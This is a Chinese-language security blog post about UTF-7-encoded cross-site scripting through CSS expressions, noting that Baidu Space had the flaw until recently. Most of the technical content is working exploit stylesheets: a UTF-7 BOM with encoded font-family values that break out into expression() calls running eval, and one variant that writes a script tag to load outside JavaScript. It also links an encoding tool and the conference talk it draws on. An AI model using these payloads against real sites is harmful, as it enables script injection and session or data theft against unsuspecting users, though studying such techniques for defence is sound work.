【XSS】CSS expressions with UTF-7,UTF-7 编码 XSS 漏洞:https://lcx.cc/post/1198/
utf-7 编码跨站漏洞,是09年某黑客大会提出来的(XSS Lightsaber techniques using Hackvertor,CONFidence2009_gareth_heyes.pdf),不过国内一直无人研究。
百度空间存在该漏洞很久了,目前才修复(不知道那个蛋疼的提交到乌云了)。
网上所有的转换工具全部不是完全转换的,只转换了特殊符号。。。
针对这个,以前蛋疼的根据这个编码介绍,自己写了个完全转换的。。。
CSS expressions with UTF-7
- UTF-7 BOM character can force UTF-7 in a external style sheet
- Would you let me upload a style sheet?
- @charset ?UTF-7?; works
- But you don?t need it
- +/v8 is all you need
原版 Exp:
+/v8
body {
font-family:'+AHgAJwA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApADsAZgBvAG4AdAAtAGYAYQBtAGkAbAB5ADoAJw-';
}
//x';xss:expression(alert(1));font-family:'
改良 Exp:
+/v8
body {
font-family:"+AHgAIgA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoACgAdwBpAG4AZABvAHcALgB4AG8AeAA9AD0AMQApAD8AJwAnADoAZQB2AGEAbAAoACIAeABvAHgAPQAxADsAZQB2AGEAbAAoAGEAbABlAHIAdAAoAC8AWABTAFMAIQAvACkAKQA7ACIAKQApADsAZgBvAG4AdAAtAGYAYQBtAGkAbAB5ADoAI-";
}
//x";xss:expression((window.xox==1)?'':eval("xox=1;eval(alert(/XSS!/));"));font-family:"
//x";xss:expression((window.xox==1)?'':eval("xox=1;document.write('<script src=js.js></script>');"));font-family:"
utf-7 编码、解码工具下载:http://www.uudisc.com/user/nuclearatk/file/4008510
XSS Lightsaber techniques using Hackvertor,CONFidence2009_gareth_heyes.pdf,该书下载地址:http://www.uudisc.com/user/nuclearatk/file/4008516
2012-11-4 12:42:29 补充:
网盘地址已失效,新的下载地址为:
XSS Lightsaber techniques using Hackvertor,CONFidence2009_gareth_heyes.pdf